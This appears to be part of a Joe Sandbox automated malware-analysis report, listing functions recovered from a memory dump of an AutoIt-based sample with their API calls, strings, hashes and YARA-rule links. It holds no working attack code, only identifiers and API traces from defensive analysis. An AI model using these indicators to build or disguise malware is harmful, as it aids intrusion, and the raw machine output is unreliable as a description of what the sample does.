Opcode Fuzzy Hash: 77886bba67edbeacc988962331cb4ec31473914445a4a5ee30b4a1e3d274d100
Instruction Fuzzy Hash: 53915075A00204EFCB14DF58C484EAABBF5BF48704F198099E80A9F3A2D775ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A1E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00A1E30D

Strings

pow, xrefs: 00A1E2E5, 00A1E302

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c3f5baac0fbb2989a98d919976a012c823859ee07cc9a14ed22b211edd0b8893
Instruction ID: edd112be2d7dc266649b8ca40cde220ef38ca2001dd24f1e7c7e6f08084dc50b
Opcode Fuzzy Hash: c3f5baac0fbb2989a98d919976a012c823859ee07cc9a14ed22b211edd0b8893
Instruction Fuzzy Hash: B9519E71A0C21296CB15F72CDA017FE3BA4AB40740F3449B9E8E6462E9DF358DD29B46

Uniqueness

Uniqueness Score: -1.00%

Function 00A0E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00A0E1B1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 946bf4ed413f64b854373e4484f6d85b3afe6f5f8a9a8983bb6f78991b9d5a15
Instruction ID: ce4c86cc4e9ff30dc81fc78fdd9204b2bd36d51c6c36294be99da892b441de8d
Opcode Fuzzy Hash: 946bf4ed413f64b854373e4484f6d85b3afe6f5f8a9a8983bb6f78991b9d5a15
Instruction Fuzzy Hash: 0751343990024ADFDF15DF68D481AFA7BA8FFA9320F244459E8919B2D0D7349D42DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A0F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 00A0F2BB

Strings

@, xrefs: 00A0F2AF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: e7c24f5935947ca803e43ccd7b762369a428da4d57f0236d1b7e800f9075dba1
Instruction ID: d6bce566176db6693390c5bf783d1ade49c3a48f8f03d4f0e0c2e1d5ffc3525c
Opcode Fuzzy Hash: e7c24f5935947ca803e43ccd7b762369a428da4d57f0236d1b7e800f9075dba1
Instruction Fuzzy Hash: CD5127714087499BD320EF54D886BABFBF8FFC5310F81885DF29941195EB708929CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00A75745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A757E0
_wcslen.LIBCMT ref: 00A757EC

Strings

CALLARGARRAY, xrefs: 00A757E6, 00A757EB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 940825073cd4791a19683142ecb6de9ceea1d2bb6ba6e2fded0cebd35654c1bf
Instruction ID: a9178c8e7042fdb7e906bd7b24e60bc4e7f8f1f999ad57e7d64f731ed51c0527
Opcode Fuzzy Hash: 940825073cd4791a19683142ecb6de9ceea1d2bb6ba6e2fded0cebd35654c1bf
Instruction Fuzzy Hash: CA418071E001099FCB14DFB9C9819BEBBB5FF59320F108069E509A7292E7709D81DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A6D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A6D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A6D13A

Strings

|, xrefs: 00A6D10B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: f6c9cdd9a7c4e7f591cb61238340db4fd0ad53a750904e5482898dfc004e0601
Instruction ID: 7ce87a6ccf708e9ca3f68dd4218bb50bfe44a60eb17567dfe6ca3487f23c9580
Opcode Fuzzy Hash: f6c9cdd9a7c4e7f591cb61238340db4fd0ad53a750904e5482898dfc004e0601
Instruction Fuzzy Hash: 8A313B71D00209ABCF15EFA5CC85AEEBFB9FF45340F000119F919A6162E775AA56CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A8356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00A83621
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00A8365C

Strings

static, xrefs: 00A835BC

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c6eab532a7a076df0db6cc32ef6f65354739f27699d62f2eefedccc55842442b
Instruction ID: 1b9722630e38481f346d9d92febc5afff9f10f79d58e6904054be6531fc3ccdd
Opcode Fuzzy Hash: c6eab532a7a076df0db6cc32ef6f65354739f27699d62f2eefedccc55842442b
Instruction Fuzzy Hash: 42319272110604AEDB14EF68DC40FFB73A9FF88720F109619F95597180DB30AD91C760

Uniqueness

Uniqueness Score: -1.00%

Function 00A84537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00A8461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A84634

Strings

', xrefs: 00A8458E

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 24213e9cf3a2846ac1df9db4ee028b9f1318807ed2b78bda6d2a33dc41d35f37
Instruction ID: 95569065bac442d6f6c91781946f3073c2674c44b286d78d9a3beacfc1fb1aaa
Opcode Fuzzy Hash: 24213e9cf3a2846ac1df9db4ee028b9f1318807ed2b78bda6d2a33dc41d35f37
Instruction Fuzzy Hash: CA31F874A0130A9FDB14DFA9C991BDE7BB5FF49300F14406AE905AB351E770A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009F3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A333A2

Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 009F3A04

Strings

Line: , xrefs: 00A333EB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 679a1b0236f1c367387d86f1e97675af2568131ccae7b830b588991c825243eb
Instruction ID: 39035dc9b8264ea5cbcc8ab8b0590b87c97fdff88280806fc969f130487476c5
Opcode Fuzzy Hash: 679a1b0236f1c367387d86f1e97675af2568131ccae7b830b588991c825243eb
Instruction Fuzzy Hash: B831F871508308AAD721EB60DC45FFB77D8AB81314F00892EF69987191DBB89A45C7C2

Uniqueness

Uniqueness Score: -1.00%

Function 00A831EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A8327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A83287

Strings

Combobox, xrefs: 00A83249

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 8e8829771917ffb7d4def2e509c119122d39d40f5bfa12ff7e3571050f8fbf44
Instruction ID: 417b86656380e72712925d29f2d94350f032de0585e22dc6f78da652922866fa
Opcode Fuzzy Hash: 8e8829771917ffb7d4def2e509c119122d39d40f5bfa12ff7e3571050f8fbf44
Instruction Fuzzy Hash: 6211B2723002087FEF21EF94DC84EFB376AEBA4764F104224F91997291E6759D518760

Uniqueness

Uniqueness Score: -1.00%

Function 00A83710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 009F600E: CreateWindowExW.USER32 ref: 009F604C
Part of subcall function 009F600E: GetStockObject.GDI32(00000011), ref: 009F6060
Part of subcall function 009F600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F606A

GetWindowRect.USER32(00000000,?), ref: 00A8377A
GetSysColor.USER32 ref: 00A83794

Strings

static, xrefs: 00A83757

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 2d2b7d2c57e123fc5c71c42ba1b2532f199e5b8a6d3b365997137ff9a6169289
Instruction ID: c4d6539c55e77f20679aba37e0a058c6eeec1f0c98d46dfd117720095c380cdd
Opcode Fuzzy Hash: 2d2b7d2c57e123fc5c71c42ba1b2532f199e5b8a6d3b365997137ff9a6169289
Instruction Fuzzy Hash: 4A1129B2610209AFDF00EFA8CC45EFA7BB8FB08714F004925F955E2250EB35E8519B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A6CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A6CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A6CDA6

Strings

<local>, xrefs: 00A6CD66

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f6aed9a7cb3dec8c606170c2943b25fdd68040ae5229e7f1ca8f5eebeb02f37d
Instruction ID: 8820fb2a0fe9a82c3252427027c9b1f1831abaf2f5fa5b4a90788e604279f48b
Opcode Fuzzy Hash: f6aed9a7cb3dec8c606170c2943b25fdd68040ae5229e7f1ca8f5eebeb02f37d
Instruction Fuzzy Hash: B811C271205631FAD7385BA68C49EF7BEBCEF127B4F00422AB18983080D7749945D6F0

Uniqueness

Uniqueness Score: -1.00%

Function 00A83429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00A834AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A834BA

Strings

edit, xrefs: 00A8348F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b0c643dd6f13d04942dd41d3886ccbf94b5b8e2faac8753176814aa361478951
Instruction ID: d25e277e04540b527ceeea1c39ee3d858779f07908e83ae562e0abdae819d5bf
Opcode Fuzzy Hash: b0c643dd6f13d04942dd41d3886ccbf94b5b8e2faac8753176814aa361478951
Instruction Fuzzy Hash: DB118F72100208ABEF11AFA4DC44EBB3B6AEF05B75F504724F961931D0C775DC519B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A56C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

CharUpperBuffW.USER32(?,?), ref: 00A56CB6
_wcslen.LIBCMT ref: 00A56CC2

Strings

STOP, xrefs: 00A56CBC, 00A56CC1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 91859cda2d4ad8caa8ce359f3b871a2d2be502ab1f98fd140af576ae3002b434
Instruction ID: 7867c7473ac586056d91ab189223f684d119f05bcaefe67bf0281e6af7985d7e
Opcode Fuzzy Hash: 91859cda2d4ad8caa8ce359f3b871a2d2be502ab1f98fd140af576ae3002b434
Instruction Fuzzy Hash: B501C433A0092A8ACB219FBDDC80ABF77B5FBA57257900934EC6297191FB31D958C750

Uniqueness

Uniqueness Score: -1.00%

Function 00A51CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

Part of subcall function 00A53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A53CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A51D4C

Strings

ListBox, xrefs: 00A51D16
ComboBox, xrefs: 00A51CEB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 044c2ab6c556de1b55d05866703d5355f55271c95d0e6fce6709259e1419fe35
Instruction ID: 1de7f6bf98ad9d43132e414692600c73292e4ed6062b57cd87af2f6b1026d512
Opcode Fuzzy Hash: 044c2ab6c556de1b55d05866703d5355f55271c95d0e6fce6709259e1419fe35
Instruction Fuzzy Hash: 7301B572601218AB8F04EFA4CD51BFE77B8FB86390B040919EC62572C1EA31590C8760

Uniqueness

Uniqueness Score: -1.00%

Function 00A51BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

Part of subcall function 00A53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A53CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00A51C46

Strings

ListBox, xrefs: 00A51C10
ComboBox, xrefs: 00A51BE5

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 69b652e0f18f09d0c41f3d146eb621b3e9944f04a555746a80b488c16a45f0fd
Instruction ID: c462ecd0edf3e3aa5b50b676d32d27320265aea214622400b06ab4dbc68a0a0c
Opcode Fuzzy Hash: 69b652e0f18f09d0c41f3d146eb621b3e9944f04a555746a80b488c16a45f0fd
Instruction Fuzzy Hash: E701A275A811086ACF04EBA0CA52BFF77A8AF51381F140429ED0667282EA359E1CC7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A77493
_wcslen.LIBCMT ref: 00A774B9

Strings

3, 3, 16, 1, xrefs: 00A77483

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 7de5da3b37a609af2d606fba94b352c3ca5646b3e69f3899db7e059bc7bd17e5
Instruction ID: 2ae23b898a9bb9112a9af7e4c5de845e452bc2b6e45f28448f9cc3cf0247ce0b
Opcode Fuzzy Hash: 7de5da3b37a609af2d606fba94b352c3ca5646b3e69f3899db7e059bc7bd17e5
Instruction Fuzzy Hash: D7E09B16615220209231137E9DC19BF56C9DFC9751714982BF989C2276EA948DD193A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A50B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00A50B23

Strings

Error allocating memory., xrefs: 00A50B1C
AutoIt, xrefs: 00A50B17

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: e8779b8f2da4752527ffd74d639b52ce30eacf8b9b60808d328619af64269cc7
Instruction ID: 5a0ba62b04a9c3683d3c1afaa04fa5bf43756dea67d57155b950ba92f879821f
Opcode Fuzzy Hash: e8779b8f2da4752527ffd74d639b52ce30eacf8b9b60808d328619af64269cc7
Instruction Fuzzy Hash: 39E0483124431C3AD22477947D43FC97A859F05B65F100466FB98A55C39AF164904BF9

Uniqueness

Uniqueness Score: -1.00%

Function 00A10D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00A0F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A10D71,?,?,?,009F100A), ref: 00A0F7CE

IsDebuggerPresent.KERNEL32(?,?,?,009F100A), ref: 00A10D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009F100A), ref: 00A10D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A10D7F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: a010d47bef28b0e0a8b7018333cef98e54976eef5962d1787f7ef95f83905d7f
Instruction ID: e5a48d89628e42e5dc279d56f98ffd0e212fe41b04f453969698b2007f749712
Opcode Fuzzy Hash: a010d47bef28b0e0a8b7018333cef98e54976eef5962d1787f7ef95f83905d7f
Instruction Fuzzy Hash: 5DE06D702003518FD370EFB8E904B827BE5BB04754F04492DE482C6692EBF4E4858BA1

Uniqueness

Uniqueness Score: -1.00%

